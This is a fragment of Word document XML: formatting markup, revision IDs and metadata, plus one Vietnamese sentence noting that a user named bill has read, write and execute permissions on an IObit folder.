    <w:p w14:paraId="0A36E4E5" w14:textId="02FB80E6" w:rsidR="00FE5CFE" w:rsidRDefault="00FE5CFE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058C9E26" w14:textId="7DC8E85C" w:rsidR="00FE5CFE" w:rsidRDefault="004E229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7157D7" wp14:editId="2A63DA81">
            <wp:extent cx="5943600" cy="24453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0989" w14:textId="1A8586D7" w:rsidR="004E2298" w:rsidRDefault="004E2298">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F92B72E" w14:textId="225C801A" w:rsidR="004E2298" w:rsidRPr="00DB530F" w:rsidRDefault="004E22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Người dùng bill có quyền đọc, ghi, thực thi trên thư mục IObit</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004E2298" w:rsidRPr="00DB53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A07"/>
    <w:rsid w:val="00007CAC"/>
    <w:rsid w:val="00124E58"/>
    <w:rsid w:val="00147F74"/>
    <w:rsid w:val="00182A5A"/>
    <w:rsid w:val="00280A07"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0035768B"/>
    <w:rsid w:val="00363143"/>
    <w:rsid w:val="004732C2"/>
    <w:rsid w:val="004A5922"/>
    <w:rsid w:val="004E2298"/>
    <w:rsid w:val="004F58B4"/>
    <w:rsid w:val="0053357C"/>
    <w:rsid w:val="00533B1B"/>
    <w:rsid w:val="0054038C"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005E012F"/>
    <w:rsid w:val="00761D93"/>
    <w:rsid w:val="007C4D92"/>
    <w:rsid w:val="00877F0B"/>
    <w:rsid w:val="00895D4A"/>
    <w:rsid w:val="00922C14"/>
    <w:rsid w:val="00926E21"/>
    <w:rsid w:val="00944A56"/>
    <w:rsid w:val="009E1D7E"/>
    <w:rsid w:val="00A76B3D"/>
    <w:rsid w:val="00AF124A"/>
    <w:rsid w:val="00B0789A"/>
    <w:rsid w:val="00B64ED2"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BE18CD"/>
    <w:rsid w:val="00BE5110"/>
    <w:rsid w:val="00BE6C13"/>
    <w:rsid w:val="00C969DE"/>
    <w:rsid w:val="00CD132F"/>
    <w:rsid w:val="00DA32A5"/>
    <w:rsid w:val="00DB530F"/>
    <w:rsid w:val="00E767B9"/>
    <w:rsid w:val="00EA1BA2"/>
    <w:rsid w:val="00EF2676"/>
    <w:rsid w:val="00FE5CFE"/>
    <w:rsid w:val="00FF5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DEA2D2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{28B8F683-8620-4D42-9201-955A44E7B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dcterms:created xsi:type="dcterms:W3CDTF">2024-01-24T03:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-24T15:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>